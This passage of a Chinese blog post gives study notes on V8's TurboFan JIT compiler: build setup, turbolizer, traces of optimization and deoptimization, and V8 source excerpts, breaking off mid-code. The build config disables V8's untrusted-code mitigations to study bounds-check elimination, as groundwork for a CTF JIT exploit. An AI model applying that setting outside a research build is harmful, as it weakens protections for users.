    <id>https://kiprey.github.io/2021/01/v8-turboFan/</id>
    <published>2021-01-23T07:20:22.000Z</published>
    <updated>2025-11-24T03:59:40.170Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、前言">一、前言</h2><ul><li><p>v8 是一种 JS 引擎的实现，它由Google开发，使用C++编写。</p><p>v8 被设计用于提高网页浏览器内部 JavaScript 代码执行的性能。为了提高性能，v8 将会把 JS 代码转换为更高效的机器码，而非传统的使用解释器执行。因此 v8 引入了 <strong>JIT (Just-In-Time)</strong> 机制，该机制将会在运行时动态编译 JS 代码为机器码，以提高运行速度。</p></li><li><p>TurboFan是 v8 的优化编译器之一，它使用了 <a href="https://darksi.de/d.sea-of-nodes/">sea of nodes</a> 这个编译器概念。</p><blockquote><p>sea of nodes 不是单纯的指某个图的结点，它是一种<strong>特殊中间表示</strong>的图。</p><p>它的表示形式与一般的CFG/DFG不同，其具体内容请查阅上面的连接。</p></blockquote><p>TurboFan的相关源码位于<code>v8/compiler</code>文件夹下。</p><span id="more"></span></li><li><p>这是笔者初次学习v8 turboFan所写下的笔记，内容包括但不限于turboFan运行参数的使用、部分<code>OptimizationPhases</code>的工作机理，以及拿来练手的<code>GoogleCTF 2018(Final) Just-In-Time</code>题题解。</p><p>该笔记<strong>基于 <a href="https://doar-e.github.io/blog/2019/01/28/introduction-to-turbofan/">Introduction to TurboFan</a> 并适当拓宽了一部分内容</strong>。如果在阅读文章时发现错误或者存在不足之处，欢迎各位师傅斧正！</p></li></ul><h2 id="二、环境搭建">二、环境搭建</h2><ul><li><p>这里的环境搭建较为简单，首先搭配一个 v8 环境（<strong>必须</strong>，没有 v8 环境要怎么研究 v8， 2333）。这里使用的版本号是<strong>7.0.276.3</strong>。</p><blockquote><p>如何搭配v8环境？请移步 <a href="https://kiprey.github.io/2020/11/fetch-chromium/">下拉&amp;编译 chromium&amp;v8 代码</a></p></blockquote><p>这里需要补充一下，v8 的 gn args中必须加一个<code>v8_untrusted_code_mitigations = false</code>的标志，即最后使用的gn args如下：</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Set build arguments here. See `gn help buildargs`.</span></span><br><span class="line">is_debug = true</span><br><span class="line">target_cpu = <span class="string">&quot;x64&quot;</span></span><br><span class="line">v8_enable_backtrace = true</span><br><span class="line">v8_enable_slow_dchecks = true</span><br><span class="line">v8_optimized_debug = false</span><br><span class="line"><span class="comment"># 加上这个</span></span><br><span class="line">v8_untrusted_code_mitigations = false</span><br></pre></td></tr></table></figure><p>具体原因将在下面讲解<code>CheckBounds</code>结点优化时提到。</p></li><li><p>然后安装一下 v8 的turbolizer，turbolizer将用于调试 v8 TurboFan中<code>sea of nodes</code>图的工具。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cd</span> v8/tools/turbolizer</span><br><span class="line"><span class="comment"># 获取依赖项</span></span><br><span class="line">npm i</span><br><span class="line"><span class="comment"># 构建</span></span><br><span class="line">npm run-script build</span><br><span class="line"><span class="comment"># 直接在turbolizer文件夹下启动静态http服务</span></span><br><span class="line">python -m SimpleHTTPServer</span><br></pre></td></tr></table></figure><blockquote><p>构建turbolizer时可能会报一些TypeScript的语法错误ERROR，这些ERROR无伤大雅，不影响turbolizer的功能使用。</p></blockquote></li><li><p>turbolizer 的使用方式如下：</p><ul><li><p>首先编写一段测试函数</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 目标优化函数</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">opt_me</span>(<span class="params">b</span>) &#123;</span><br><span class="line">    <span class="keyword">let</span> values = [<span class="number">42</span>,<span class="number">1337</span>];</span><br><span class="line">    <span class="keyword">let</span> x = <span class="number">10</span>;</span><br><span class="line">    <span class="keyword">if</span> (b == <span class="string">&quot;foo&quot;</span>)</span><br><span class="line">      x = <span class="number">5</span>;</span><br><span class="line">                         </span><br><span class="line">    <span class="keyword">let</span> y = x + <span class="number">2</span>;</span><br><span class="line">    y = y + <span class="number">1000</span>;</span><br><span class="line">    y = y * <span class="number">2</span>;</span><br><span class="line">    y = y &amp; <span class="number">10</span>;</span><br><span class="line">    y = y / <span class="number">3</span>;</span><br><span class="line">    y = y &amp; <span class="number">1</span>;</span><br><span class="line">    <span class="keyword">return</span> values[y];</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// 必须！在优化该函数前必须先进行一次编译，以便于为该函数提供type feedback</span></span><br><span class="line"><span class="title function_">opt_me</span>();</span><br><span class="line"><span class="comment">// 必须! 使用v8 natives-syntax来强制优化该函数</span></span><br><span class="line">%<span class="title class_">OptimizeFunctionOnNextCall</span>(opt_me);</span><br><span class="line"><span class="comment">// 必须！ 不调用目标函数则无法执行优化</span></span><br><span class="line"><span class="title function_">opt_me</span>();</span><br></pre></td></tr></table></figure><blockquote><p>一定要在执行<code>%OptimizeFunctionOnNextCall(opt_me)</code>之前调用一次目标函数，否则生成的graph将会因为没有type feedback而<strong>导致完全不一样的结果</strong>。</p><p>需要注意的是type feedback<strong>有点玄学</strong>，在执行<code>OptimizeFunctionOnNextCall</code>前，如果目标函数内部存在一些边界操作（例如多次使用超过<code>Number.MAX_SAFE_INTEGER</code>大小的整数等），那么调用目标函数的方式<strong>可能</strong>会影响turboFan的功能，包括但不限于传入参数的不同、调用目标函数次数的不同等等等等。</p><p>因此在执行<code>%OptimizeFunctionOnNextCall</code>前，目标函数的调用方式，必须自己把握，手动确认<strong>调用几次，传入什么参数</strong>会优化出特定的效果。</p></blockquote><p>若想优化一个函数，除了可以使用<code>%OptimizeFunctionOnNextCall</code>以外，还可以多次执行该函数（次数要大，建议上for循环）来触发优化。</p></li><li><p>然后使用 d8 执行，不过需要加上<code>--trace-turbo</code>参数。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">$  ../../v8/v8/out.gn/x64.debug/d8 test.js --allow-natives-syntax --trace-turbo   </span><br><span class="line">Concurrent recompilation has been disabled <span class="keyword">for</span> tracing.</span><br><span class="line">---------------------------------------------------</span><br><span class="line">Begin compiling method opt_me using Turbofan</span><br><span class="line">---------------------------------------------------</span><br><span class="line">Finished compiling method opt_me using Turbofan</span><br></pre></td></tr></table></figure><p>之后本地就会生成<code>turbo.cfg</code>和<code>turbo-xxx-xx.json</code>文件。</p></li><li><p>使用浏览器打开<code>127.0.0.1:8000</code>（注意之前在turbolizer文件夹下启动了http服务）</p><p>然后点击右上角的3号按钮，在文件选择窗口中选择刚刚生成的<code>turbo-xxx-xx.json</code>文件，之后就会显示以下信息：</p><p><img src="/2021/01/v8-turboFan/turbolizer.png" alt="img"></p><p>不过这里的结点只显示了控制结点，如果需要显示全部结点，则先点击一下上方的2号按钮，将结点全部展开，之后再点击1号按钮，重新排列：</p><p><img src="/2021/01/v8-turboFan/turbolizer1.png" alt="img"></p></li></ul></li></ul><h2 id="三、turboFan的代码优化">三、turboFan的代码优化</h2><ul><li><p>我们可以使用 <code>--trace-opt</code>参数来追踪函数的优化信息。以下是函数<code>opt_me</code>被turboFan优化时所生成的信息。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">$ ../../v8/v8/out.gn/x64.debug/d8 test.js --allow-natives-syntax --trace-opt </span><br><span class="line">[manually marking 0x0a7a24823759 &lt;JSFunction opt_me (sfi = 0xa7a24823591)&gt; <span class="keyword">for</span> non-concurrent optimization]</span><br><span class="line">[compiling method 0x0a7a24823759 &lt;JSFunction opt_me (sfi = 0xa7a24823591)&gt; using TurboFan]</span><br><span class="line">[optimizing 0x0a7a24823759 &lt;JSFunction opt_me (sfi = 0xa7a24823591)&gt; - took 53.965, 19.410, 0.667 ms]</span><br></pre></td></tr></table></figure><blockquote><p>上面输出中的<code>manually marking</code>即我们在代码中手动设置的<code>%OptimizeFunctionOnNextCall</code>。</p></blockquote><p>我们可以使用 v8 本地语法来查看优化前和优化后的机器码（使用<code>%DisassembleFunction</code>本地语法）</p><blockquote><p>输出信息过长，这里只截取一部分输出。</p></blockquote><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">$ ../../v8/v8/out.gn/x64.debug/d8 test.js --allow-natives-syntax  </span><br><span class="line"></span><br><span class="line">0x2b59fe964c1: [Code]</span><br><span class="line"> - map: 0x05116bd02ae9 &lt;Map&gt;</span><br><span class="line">kind = BUILTIN</span><br><span class="line">name = InterpreterEntryTrampoline</span><br><span class="line">compiler = unknown</span><br><span class="line">address = 0x2b59fe964c1</span><br><span class="line"></span><br><span class="line">Instructions (size = 995)</span><br><span class="line">0x2b59fe96500     0  488b5f27       REX.W movq rbx,[rdi+0x27]</span><br><span class="line">0x2b59fe96504     4  488b5b07       REX.W movq rbx,[rbx+0x7]</span><br><span class="line">0x2b59fe96508     8  488b4b0f       REX.W movq rcx,[rbx+0xf]</span><br><span class="line">....</span><br><span class="line"></span><br><span class="line">0x2b59ff49541: [Code]</span><br><span class="line"> - map: 0x05116bd02ae9 &lt;Map&gt;</span><br><span class="line">kind = OPTIMIZED_FUNCTION</span><br><span class="line">stack_slots = 5</span><br><span class="line">compiler = turbofan</span><br><span class="line">address = 0x2b59ff49541</span><br><span class="line"></span><br><span class="line">Instructions (size = 212)</span><br><span class="line">0x2b59ff49580     0  488d1df9ffffff REX.W leaq rbx,[rip+0xfffffff9]</span><br><span class="line">0x2b59ff49587     7  483bd9         REX.W cmpq rbx,rcx</span><br><span class="line">0x2b59ff4958a     a  7418           jz 0x2b59ff495a4  &lt;+0x24&gt;</span><br><span class="line">0x2b59ff4958c     c  48ba000000003e000000 REX.W movq rdx,0x3e00000000</span><br><span class="line">...</span><br></pre></td></tr></table></figure><p>可以看到，所生成的代码长度从原先的995，优化为212，大幅度优化了代码。</p><blockquote><p>需要注意的是，即便不使用<code>%OptimizeFunctionOnNextCall</code>，将<code>opt_me</code>函数重复执行一定次数，一样可以触发TurboFan的优化。</p></blockquote></li><li><p>细心的小伙伴应该可以在上面环境搭建的图中看到<code>deoptimize</code>反优化。为什么需要反优化？这就涉及到turboFan的优化机制。以下面这个js代码为例（注意：没有使用<code>%OptimizeFunctionOnNextCall</code>）</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">Player</span>&#123;&#125;</span><br><span class="line"><span class="keyword">class</span> <span class="title class_">Wall</span>&#123;&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">move</span>(<span class="params">obj</span>) &#123;</span><br><span class="line">  <span class="keyword">var</span> tmp = obj.<span class="property">x</span> + <span class="number">42</span>;</span><br><span class="line">  <span class="keyword">var</span> x = <span class="title class_">Math</span>.<span class="title function_">random</span>();</span><br><span class="line">  x += <span class="number">1</span>;</span><br><span class="line">  <span class="keyword">return</span> tmp + x;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">0</span>; i &lt; <span class="number">0x10000</span>; ++i) &#123;</span><br><span class="line">  <span class="title function_">move</span>(<span class="keyword">new</span> <span class="title class_">Player</span>());</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="title function_">move</span>(<span class="keyword">new</span> <span class="title class_">Wall</span>());</span><br><span class="line"><span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">0</span>; i &lt; <span class="number">0x10000</span>; ++i) &#123;</span><br><span class="line">  <span class="title function_">move</span>(<span class="keyword">new</span> <span class="title class_">Wall</span>());</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>跟踪一下该代码的opt以及deopt：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">$ ../../v8/v8/out.gn/x64.debug/d8 test.js --allow-natives-syntax  --trace-opt --trace-deopt </span><br><span class="line">[marking 0x3c72eab23a99 &lt;JSFunction move (sfi = 0x3c72eab235f9)&gt; <span class="keyword">for</span> optimized recompilation, reason: small <span class="keyword">function</span>, ICs with typeinfo: 7/7 (100%), generic ICs: 0/7 (0%)]</span><br><span class="line">[compiling method 0x3c72eab23a99 &lt;JSFunction move (sfi = 0x3c72eab235f9)&gt; using TurboFan]</span><br><span class="line">[optimizing 0x3c72eab23a99 &lt;JSFunction move (sfi = 0x3c72eab235f9)&gt; - took 6.583, 2.385, 0.129 ms]</span><br><span class="line">[completed optimizing 0x3c72eab23a99 &lt;JSFunction move (sfi = 0x3c72eab235f9)&gt;]</span><br><span class="line"><span class="comment"># 分割线---------------------------------------------------------------------</span></span><br><span class="line">[marking 0x3c72eab238e9 &lt;JSFunction (sfi = 0x3c72eab234e9)&gt; <span class="keyword">for</span> optimized recompilation, reason: hot and stable, ICs with typeinfo: 7/13 (53%), generic ICs: 0/13 (0%)]</span><br><span class="line">[compiling method 0x3c72eab238e9 &lt;JSFunction (sfi = 0x3c72eab234e9)&gt; using TurboFan OSR]</span><br><span class="line">[optimizing 0x3c72eab238e9 &lt;JSFunction (sfi = 0x3c72eab234e9)&gt; - took 3.684, 7.337, 0.409 ms]</span><br><span class="line"><span class="comment"># 分割线---------------------------------------------------------------------</span></span><br><span class="line">[deoptimizing (DEOPT soft): begin 0x3c72eab238e9 &lt;JSFunction (sfi = 0x3c72eab234e9)&gt; (opt <span class="comment">#1) @6, FP to SP delta: 104, caller sp: 0x7ffed15d2a08]</span></span><br><span class="line">            ;;; deoptimize at &lt;test.js:15:6&gt;, Insufficient <span class="built_in">type</span> feedback <span class="keyword">for</span> construct</span><br><span class="line">  ...</span><br><span class="line"> </span><br><span class="line">[deoptimizing (soft): end 0x3c72eab238e9 &lt;JSFunction (sfi = 0x3c72eab234e9)&gt; @6 =&gt; node=154, pc=0x7f0d956522e0, <span class="built_in">caller</span> sp=0x7ffed15d2a08, took 0.496 ms]</span><br><span class="line">[deoptimizing (DEOPT eager): begin 0x3c72eab23a99 &lt;JSFunction move (sfi = 0x3c72eab235f9)&gt; (opt <span class="comment">#0) @1, FP to SP delta: 24, caller sp: 0x7ffed15d2990]</span></span><br><span class="line">            ;;; deoptimize at &lt;test.js:5:17&gt;, wrong map</span><br><span class="line">  ...</span><br><span class="line">  </span><br><span class="line">[deoptimizing (eager): end 0x3c72eab23a99 &lt;JSFunction move (sfi = 0x3c72eab235f9)&gt; @1 =&gt; node=0, pc=0x7f0d956522e0, <span class="built_in">caller</span> sp=0x7ffed15d2990, took 0.355 ms]</span><br><span class="line"><span class="comment"># 分割线---------------------------------------------------------------------</span></span><br><span class="line">[marking 0x3c72eab23a99 &lt;JSFunction move (sfi = 0x3c72eab235f9)&gt; <span class="keyword">for</span> optimized recompilation, reason: small <span class="keyword">function</span>, ICs with typeinfo: 7/7 (100%), generic ICs: 0/7 (0%)]</span><br><span class="line">[compiling method 0x3c72eab23a99 &lt;JSFunction move (sfi = 0x3c72eab235f9)&gt; using TurboFan]</span><br><span class="line">[optimizing 0x3c72eab23a99 &lt;JSFunction move (sfi = 0x3c72eab235f9)&gt; - took 1.435, 2.427, 0.159 ms]</span><br><span class="line">[completed optimizing 0x3c72eab23a99 &lt;JSFunction move (sfi = 0x3c72eab235f9)&gt;]</span><br><span class="line">[compiling method 0x3c72eab238e9 &lt;JSFunction (sfi = 0x3c72eab234e9)&gt; using TurboFan OSR]</span><br><span class="line">[optimizing 0x3c72eab238e9 &lt;JSFunction (sfi = 0x3c72eab234e9)&gt; - took 3.399, 6.299, 0.239 ms]</span><br></pre></td></tr></table></figure><ul><li>首先，<code>move</code>函数被标记为可优化的(optimized recompilation)，原因是该函数为small function。然后便开始重新编译以及优化。</li><li>之后，<code>move</code>函数再一次被标记为可优化的，原因是<code>hot and stable</code>。这是因为 v8 首先生成的是 <a href="https://v8.dev/docs/ignition">ignition bytecode</a>。 如果某个函数被重复执行多次，那么TurboFan就会重新生成一些优化后的代码。</li></ul><blockquote><p>以下是获取优化理由的的v8代码。如果该JS函数可被优化，则将在外部的v8函数中，mark该JS函数为待优化的。</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">OptimizationReason <span class="title">RuntimeProfiler::ShouldOptimize</span><span class="params">(JSFunction* function,</span></span></span><br><span class="line"><span class="params"><span class="function">                                                   JavaScriptFrame* frame)</span> </span>&#123;</span><br><span class="line">  SharedFunctionInfo* shared = function-&gt;<span class="built_in">shared</span>();</span><br><span class="line">  <span class="type">int</span> ticks = function-&gt;<span class="built_in">feedback_vector</span>()-&gt;<span class="built_in">profiler_ticks</span>();</span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> (shared-&gt;<span class="built_in">GetBytecodeArray</span>()-&gt;<span class="built_in">length</span>() &gt; kMaxBytecodeSizeForOpt) &#123;</span><br><span class="line">    <span class="keyword">return</span> OptimizationReason::kDoNotOptimize;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="type">int</span> ticks_for_optimization =</span><br><span class="line">      kProfilerTicksBeforeOptimization +</span><br><span class="line">      (shared-&gt;<span class="built_in">GetBytecodeArray</span>()-&gt;<span class="built_in">length</span>() / kBytecodeSizeAllowancePerTick);</span><br><span class="line">  <span class="comment">// 如果执行次数较多，则标记为HotAndStable</span></span><br><span class="line">  <span class="keyword">if</span> (ticks &gt;= ticks_for_optimization) &#123;</span><br><span class="line">    <span class="keyword">return</span> OptimizationReason::kHotAndStable;</span><br><span class="line">  <span class="comment">// 如果函数较小，则为 small function</span></span><br><span class="line">  &#125; <span class="keyword">else</span> <span class="keyword">if</span> (!any_ic_changed_ &amp;&amp; shared-&gt;<span class="built_in">GetBytecodeArray</span>()-&gt;<span class="built_in">length</span>() &lt;</span><br><span class="line">                                     kMaxBytecodeSizeForEarlyOpt) &#123;</span><br><span class="line">    <span class="comment">// If no IC was patched since the last tick and this function is very</span></span><br><span class="line">    <span class="comment">// small, optimistically optimize it now.</span></span><br><span class="line">    <span class="keyword">return</span> OptimizationReason::kSmallFunction;</span><br><span class="line">  &#125; <span class="keyword">else</span> <span class="keyword">if</span> (FLAG_trace_opt_verbose) &#123;</span><br><span class="line">    <span class="built_in">PrintF</span>(<span class="string">&quot;[not yet optimizing &quot;</span>);</span><br><span class="line">    function-&gt;<span class="built_in">PrintName</span>();</span><br><span class="line">    <span class="built_in">PrintF</span>(<span class="string">&quot;, not enough ticks: %d/%d and &quot;</span>, ticks,</span><br><span class="line">           kProfilerTicksBeforeOptimization);</span><br><span class="line">    <span class="keyword">if</span> (any_ic_changed_) &#123;</span><br><span class="line">      <span class="built_in">PrintF</span>(<span class="string">&quot;ICs changed]\n&quot;</span>);</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">      <span class="built_in">PrintF</span>(<span class="string">&quot; too large for small function optimization: %d/%d]\n&quot;</span>,</span><br><span class="line">             shared-&gt;<span class="built_in">GetBytecodeArray</span>()-&gt;<span class="built_in">length</span>(), kMaxBytecodeSizeForEarlyOpt);</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> OptimizationReason::kDoNotOptimize;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><ul><li><p>但接下来就开始<strong>deopt</strong> move函数了，原因是<code>Insufficient type feedback for construct</code>，目标代码是<code>move(new Wall())</code>中的<code>new Wall()</code>。</p><p>这是因为turboFan的代码优化<strong>基于推测</strong>，即<code>speculative optimizations</code>。当我们多次执行<code>move(new Player())</code>时，turboFan会猜测move函数的参数总是<code>Player</code>对象，因此将move函数优化为更适合<code>Player</code>对象执行的代码，这样使得<code>Player</code>对象使用move函数时速度将会很快。</p><p>这种猜想机制需要一种反馈来动态修改猜想，那么这种反馈就是 <a href="https://mrale.ph/blog/2015/01/11/whats-up-with-monomorphism.html">type feedback</a>，Ignition instructions将利用 type feedback来帮助TurboFan的<code>speculative optimizations</code>。</p><blockquote><p>v8源码中，<code>JSFunction</code>类中存在一个类型为<code>FeedbackVector</code>的成员变量，该FeedbackVector将在JS函数被编译后启用。</p></blockquote><p>因此一旦传入的参数不再是<code>Player</code>类型，即刚刚所说的<code>Wall</code>类型，那么将会使得猜想不成立，因此立即反优化，即<strong>销毁一部分的ignition bytecode并重新生成</strong>。</p><p>需要注意的是，反优化机制(<strong>deoptimization</strong>)有着巨大的性能成本，应尽量避免反优化的产生。</p></li><li><p>下一个<code>deopt</code>的原因为<code>wrong map</code>。这里的<strong>map</strong>可以暂时理解为<strong>类型</strong>。与上一条deopt的原因类似，所生成的<code>move</code>优化函数只是针对于<code>Player</code>对象，因此一旦传入一个<code>Wall</code>对象，那么传入的类型就与函数中的类型不匹配，所以只能开始反优化。</p></li><li><p>如果我们在代码中来回使用<code>Player</code>对象和<code>Wall</code>对象，那么TurboFan也会综合考虑，并相应的再次优化代码。</p></li></ul></li></ul><h2 id="四、turboFan的执行流程">四、turboFan的执行流程</h2><ul><li><p>turboFan的代码优化有多条执行流，其中最常见到的是下面这条：<br><img src="/2021/01/v8-turboFan/createGraph-bt1.png" alt="img"></p></li><li><p>从<code>Runtime_CompileOptimized_Concurrent</code>函数开始，设置并行编译&amp;优化 特定的JS函数</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// v8\src\runtime\runtime-compiler.cc 46</span></span><br><span class="line"><span class="built_in">RUNTIME_FUNCTION</span>(Runtime_CompileOptimized_Concurrent) &#123;</span><br><span class="line">  <span class="function">HandleScope <span class="title">scope</span><span class="params">(isolate)</span></span>;</span><br><span class="line">  <span class="built_in">DCHECK_EQ</span>(<span class="number">1</span>, args.<span class="built_in">length</span>());</span><br><span class="line">  <span class="built_in">CONVERT_ARG_HANDLE_CHECKED</span>(JSFunction, function, <span class="number">0</span>);</span><br><span class="line">  <span class="function">StackLimitCheck <span class="title">check</span><span class="params">(isolate)</span></span>;</span><br><span class="line">  <span class="keyword">if</span> (check.<span class="built_in">JsHasOverflowed</span>(kStackSpaceRequiredForCompilation * KB)) &#123;</span><br><span class="line">    <span class="keyword">return</span> isolate-&gt;<span class="built_in">StackOverflow</span>();</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="comment">// 设置并行模式，之后开始编译与优化</span></span><br><span class="line">  <span class="keyword">if</span> (!Compiler::<span class="built_in">CompileOptimized</span>(function, ConcurrencyMode::kConcurrent)) &#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">ReadOnlyRoots</span>(isolate).<span class="built_in">exception</span>();</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="built_in">DCHECK</span>(function-&gt;<span class="built_in">is_compiled</span>());</span><br><span class="line">  <span class="keyword">return</span> function-&gt;<span class="built_in">code</span>();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>在<code>Compiler::CompileOptimized</code>函数中，继续执行<code>GetOptimizedCode</code>函数，并将可能生成的优化代码传递给<code>JSFunction</code>对象。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// v8\src\compiler.cc</span></span><br><span class="line"><span class="function"><span class="type">bool</span> <span class="title">Compiler::CompileOptimized</span><span class="params">(Handle&lt;JSFunction&gt; function,</span></span></span><br><span class="line"><span class="params"><span class="function">                                ConcurrencyMode mode)</span> </span>&#123;</span><br><span class="line">  <span class="keyword">if</span> (function-&gt;<span class="built_in">IsOptimized</span>()) <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">  Isolate* isolate = function-&gt;<span class="built_in">GetIsolate</span>();</span><br><span class="line">  <span class="built_in">DCHECK</span>(AllowCompilation::<span class="built_in">IsAllowed</span>(isolate));</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Start a compilation.</span></span><br><span class="line">  Handle&lt;Code&gt; code;</span><br><span class="line">  <span class="keyword">if</span> (!<span class="built_in">GetOptimizedCode</span>(function, mode).<span class="built_in">ToHandle</span>(&amp;code)) &#123;</span><br><span class="line">    <span class="comment">// Optimization failed, get unoptimized code. Unoptimized code must exist</span></span><br><span class="line">    <span class="comment">// already if we are optimizing.</span></span><br><span class="line">    <span class="built_in">DCHECK</span>(!isolate-&gt;<span class="built_in">has_pending_exception</span>());</span><br><span class="line">    <span class="built_in">DCHECK</span>(function-&gt;<span class="built_in">shared</span>()-&gt;<span class="built_in">is_compiled</span>());</span><br><span class="line">    <span class="built_in">DCHECK</span>(function-&gt;<span class="built_in">shared</span>()-&gt;<span class="built_in">IsInterpreted</span>());</span><br><span class="line">    code = <span class="built_in">BUILTIN_CODE</span>(isolate, InterpreterEntryTrampoline);</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Install code on closure.</span></span><br><span class="line">  function-&gt;<span class="built_in">set_code</span>(*code);</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Check postconditions on success.</span></span><br><span class="line">  <span class="built_in">DCHECK</span>(!isolate-&gt;<span class="built_in">has_pending_exception</span>());</span><br><span class="line">  <span class="built_in">DCHECK</span>(function-&gt;<span class="built_in">shared</span>()-&gt;<span class="built_in">is_compiled</span>());</span><br><span class="line">  <span class="built_in">DCHECK</span>(function-&gt;<span class="built_in">is_compiled</span>());</span><br><span 